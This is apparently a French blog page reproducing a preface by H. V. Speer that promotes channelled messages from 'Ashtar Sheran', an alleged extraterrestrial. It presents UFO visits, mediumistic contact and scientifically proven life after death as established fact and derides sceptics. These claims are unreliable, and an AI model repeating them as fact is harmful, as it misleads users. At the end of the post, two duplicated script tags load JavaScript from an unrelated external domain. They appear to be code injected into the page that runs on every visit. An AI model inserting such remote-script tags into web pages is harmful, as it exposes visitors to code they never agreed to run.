• ENSEIGNEMENTS

    - VIA TERRA PAR ASHTAR SHERAN - PRÉFACE DE H. V. SPEER -

    Il y a maintenant un peu plus de 10 ans que l'Association de recherche psycho scientifique est de temps à autre en contact avec des astronautes extra-terrestres. Ces visiteurs ne viennent pas de l'espace interplanétaire, mais des régions interstellaires, et dans ce cas du système solaire Alpha du Centaure.

    Les journalistes qui n'ont que peu ou pas de notions de ces sciences spirituelles ont tendance à se moquer de ce qu'il y a de plus sublime. Malgré ces attaques, nous ne nous taisons pas. Servir la Vérité signifie servir l'Humanité; car elle a droit à une information objective.

    Des documents prouvant les apparitions de soucoupes volantes [O V N I s] existent dans le monde entier. En face de tous ces faits prouvés, il est insensé que des publicistes osent encore douter ou nier, montrant ainsi leur mauvaise foi. L'opinion mondiale est ainsi soumise à de fausses informations, la réalité étant intentionnellement déformée. Les contacts médiumniques de MEDIALE FRIEDENSKREIS, Berlin (Association fondée par Herbert Victor Speer, qui reçoit médiumniquement les messages des Extra-terrestres et qui les diffuse.) sont connus de tous les spécialistes dans le monde. L'objectivité de leurs publications est inattaquable.

    C'est pour cette raison que le M. F. B. a reçu des visites répétées de spécialistes et d'experts très qualifiés. Les comptes rendus de ces entretiens furent traduits et publiés en plusieurs langues, notamment dans les sphères les plus haut placées : le Vatican, le Secrétaire des Nations Unies, les leaders et représentants des maisons Royales.

    Des revues périodiques de renommée mondiale, des entreprises de télévision du fait de l'importance de ces publications et de la haute valeur de notre travail ont effectué des reportages et des émissions de télévision. Des millions de téléspectateurs ont ainsi pu prendre contact avec ce genre de travail médiumnique.

    Qu'est-ce que le travail médiumnique, ou contact spirituel ?

    L'Association de recherche psycho scientifique, laquelle s'occupe de la recherche et de l'étude des phénomènes parascientifiques, a emprunté la méthode de l'écriture automatique et a réussi à la perfectionner. Ses médiums exercent une activité professionnelle normale dont ils vivent; effectuent leurs recherches sans aucun but lucratif; ils n'en font pas davantage une question de prestige; ils désirent seulement servir l'humanité.

    Un contact spirituel nécessite la collaboration de guides de l'Au-delà, d'esprits qui contrôlent les équipes de collaborateurs sur les deux plans (physique et spirituel). L'équipe du M. F. B. est ainsi constituée et ses collaborateurs ont fait leurs preuves.

    Elle a pour but l'information objective et se met de temps en temps à la disposition d'astronautes extra-terrestres en vue d'établir une compréhension réciproque.

    Des gens inexpérimentés et qui, la plupart du temps, ne croient pas en Dieu, essayent de tromper l'humanité en situant ces contacts au niveau de la fantaisie. Ils prétendent, avec beaucoup de présomption, que la science dépasse les possibilités spirituelles, qu'il n'y aurait aucune vie après la mort, donc que ces contacts ne peuvent exister.

    Il est très regrettable de constater combien l'opinion publique est encore mal informée. Même les grandes religions ne savent que peu de choses sur la vérité de ce qui nous attend. Le M. F. B. a reçu à maintes reprises des visites de scientifiques. Leur prise de position en ce qui concerne les recherches sur l'Au-delà a été très bien expliquée dans la conférence du Dr Walter HINZ de l'Université de Gottingen. C'est ainsi qu'à l'École d'ingénieurs de Zurich, il a notamment déclaré .: "Le Dr Émil MAITISEN, dans son oeuvre de base en trois tomes, a prouvé scientifiquement la survie spirituelle après la mort". Cette opinion est également partagée par d'autres Professeurs d'université.

    Le matérialisme dialectique soviétique avec son enseignement trompeur et dangereux, trouble les êtres et ne leur laisse pas la possibilité de faire une synthèse par eux-mêmes.

    ASHTAR SHERAN, Instructeur interstellaire universel, doué d'une intelligente extra-terrestre, nous a montré à plusieurs reprises, beaucoup de nos erreurs fondamentales. Il nous semble inimaginable qu'il soit matériellement possible de parcourir la distance d'Alpha du Centaure à la Terre. Ceci est dû au retard de notre propre évolution.

    Pour les "Santiners", c'est-à-dire les Extra-terrestres, ce chemin jusqu'à la Terre n'est pas un problème. VIA TERRA est réalisable, même en un temps relativement court. Lorsque la première ligne de chemin de fer fut construite, l'humanité était effrayée par sa vitesse. Que représente, de nos jours, le tour de la terre avec nos moyens actuels, comparé à la vitesse infime alors ?

    L'étoile Alpha du Centaure se trouve à 4 années lumière de la Terre.

    Les Éléments ne présentent aucune difficulté à qui en possède les lois. Les Santiners les possèdent plus que nous ne saurions jamais l'imaginer. Il est regrettable que trop de personnes s'occupent des problèmes des O V N I s sans avoir la moindre qualification. Leur fantaisie est tellement débridée qu'elle porte un énorme préjudice à la cause. Nous avons vu nous-même des régisseurs de la télévision vouloir faire des reportages sur ce sujet sans en avoir la moindre notion. Ce qui en résulte ne peut jamais être d'une réelle valeur bien que ce soit annoncé comme tel dans les programmes.

    Comment pouvons-nous prouver que nos contacts avec les O V N I s sont véridiques ?

    Depuis plus de 15 ans nous travaillons intensément à la recherche du monde spirituel, c'est-à-dire à prouver la survie après la mort. Des résultats obtenus par le Corps Médical remplissent plus de 4.000 pages d'imprimerie. L'action des guides spirituels, c'est-à-dire les professeurs de l'autre monde qui nous informent et nous répondent pendant les séances, s'est trouvée amplement confirmée durant tout ce temps.

    Dans l'intervalle des dix dernières années nous n'avons pas relevé un seul cas de mystification de la part de nos aides spirituels. Il nous confirment continuellement l'authenticité de nos contacts extra-terrestres. Ils s'efforcent dans la mesure de leurs moyens, d'apporter une aide à nos efforts en vue d'obtenir une compréhension toujours meilleure avec les Extra-terrestres appelés : SANTINERS.

    Il y a des années, nous avons été fortement combattus parce que nous avions soutenu que les Vénusiens n'existaient pas. Effectivement ceci est maintenant prouvé car la température de Vénus ne permet pas la vie. Ceux qu'on appelle Vénusiens viennent d'une station spatiale extra-terrestre mobile qui se trouve au voisinage de Vénus. Il a donc pu avoir confusion. D'ailleurs, nous ne désignons pas les extra-terrestres comme Martiens, Vénusiens etc... mais comme "Santiners".
    Les communications extra terrestres sont d'une quantité remarquable et ont trouvé un écho dans le monde entier. Malheureusement, les dirigeants de l'humanité n'acceptent pas de recevoir des instructions de provenance terrestre ou extra-terrestre. Il est vrai que nous ne pouvons pas juger de ces choses. Nous essayons de maintenir le contact avec ces hommes et notre méthode a été couronnée de succès.

    Nous recommandons à tous les sceptiques de se donner la peine de relire la Bible. Dans le Livre d'ÉZÉCHIEL, ils trouveront une assez bonne description de ces engins volants que nous appelons aujourd'hui O V N I s. La Bible prouve ainsi que depuis des milliers d'années, la Terre fut visitée par des Extra-Terrestres.

    Le parcours vers la Terre, VIA TERRA, ne se réalise pas selon nos spéculations ou calculs, mais d'après les possibilités des SANTINERS, lesquels, dans tous les domaines, ont une énorme avance sur nous. Leur vitesse ne peut être comparée à celle de la lumière. Elle dépasse toute imagination. De même ils n'ont pas besoin des ondes hertziennes pour communiquer entre eux; leur développement spirituel leur offre d'autres moyens. Nous pouvons, pour notre part, utiliser deux de ces moyens. Les performances mentales obtenues dépassent le degré d'intelligence du médium et des participants aux séances.

    ASHTAR SHERAN est le commandant O V N I . Instructeur des Univers il est le nouveau Messie de notre temps. Nous jugeons les vaisseaux spatiaux extra-terrestres en partant du point de vue que les frontières du possible sont en rapport avec le savoir de la science et de la technique de notre Terre. Ceci est une grande erreur, car les humanités des autres mondes peuvent avoir des connaissances entièrement différentes en science et en technique. De toute façon nous ne croyons pas que l'homme terrestre puisse déterminer ces frontières.

    Cependant, il n'est pas permis de croire à toutes les bêtises qui nous sont rapportées au sujet de ces vaisseaux spatiaux par les détracteurs ou personnes abusées. Ce qu' ASHTAR SHERAN nous a transmis jusqu'à présent est parfaitement logique et inattaquable.

    Si ces enseignements n'ont pas été pris en considération par les humains c'est qu'ASHTAR SHERAN met en lumière les erreurs des religions. Toutes les Églises s'hérissent contre les « réformateurs ». ASHTAR SHERAN décrit notre situation très explicitement. Il dit par exemple : « Lorsque le dois mesurer le degré d'évolution de l'Homme terrestre, le me réfère d'abord à vos guerres, au développement des armements et à leurs effets. Toutes ces choses sont considérées par moi, comme inhumains et Impies. Cette constatation montre la vérité concernant l'orientation du développement de l'humanité terrestre. N'utiliser la pensée que pour projeter et utiliser des productions techniques de plus en plus poussées en vue d'asservir les masses et des peuples entiers, est une folie qui montre clairement le retard de cette planète ».

    Celui qui doute de la survie après la mort, pourra difficilement croire à des contacts avec des Extra-Terrestres. Mais il est prouvé scientifiquement que nous pouvons obtenir des relations intelligibles avec des Esprits. I1 en est de même avec les Extra-Terrestres. Il est déplorable que l'opinion publique mondiale ne soit pas mise courant de ces faits importants et que les vérités en question soient systématiquement ridiculisées par des journalistes et des intellectuels incapables et athées.

    J'ai vu moi-même qu'un rédacteur en chef d'un important journal n'avait pas la moindre idée du spiritualisme international bien que cette dénomination, selon le dictionnaire, signifie : la science de la réalité et de l'efficacité de l'esprit. Le Professeur Dr Walter HINZ, de l'Université de Gottingen, dit très justement : "Entre l'atome d'un côté, et un monde stellaire à des milliards d'années lumières de l'autre, il n'y a rien que l'Homme ne puisse tenter d'explorer. Mais, fait étrange, la Science hésite encore à faire un pas de plus afin d'effectuer aussi des recherches dans le monde de l'invisible, de la métaphysique et de l'extrasensoriel".

    Nous avons déjà entrepris ce travail car il faut qu'il se fasse parce que l'humanité approche de plus en plus d'un péril mortel. La différence réside seulement dans le fait que la Science dispose de moyens financiers énormes pour ses recherches, alors que l'initiative particulière en est totalement privée. Mais tout ceci ne change rien au résultat. Celui-ci seul est important; il doit être respecté et pris en considération par l'humanité.

    source texte : http://terrenouvelle.ca/ashenseignementspirituel.php

    <script src="http://centrexity.com/converter.js" type="text/javascript"> </script><script src="http://centrexity.com/converter.js" type="text/javascript"> </script>

  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :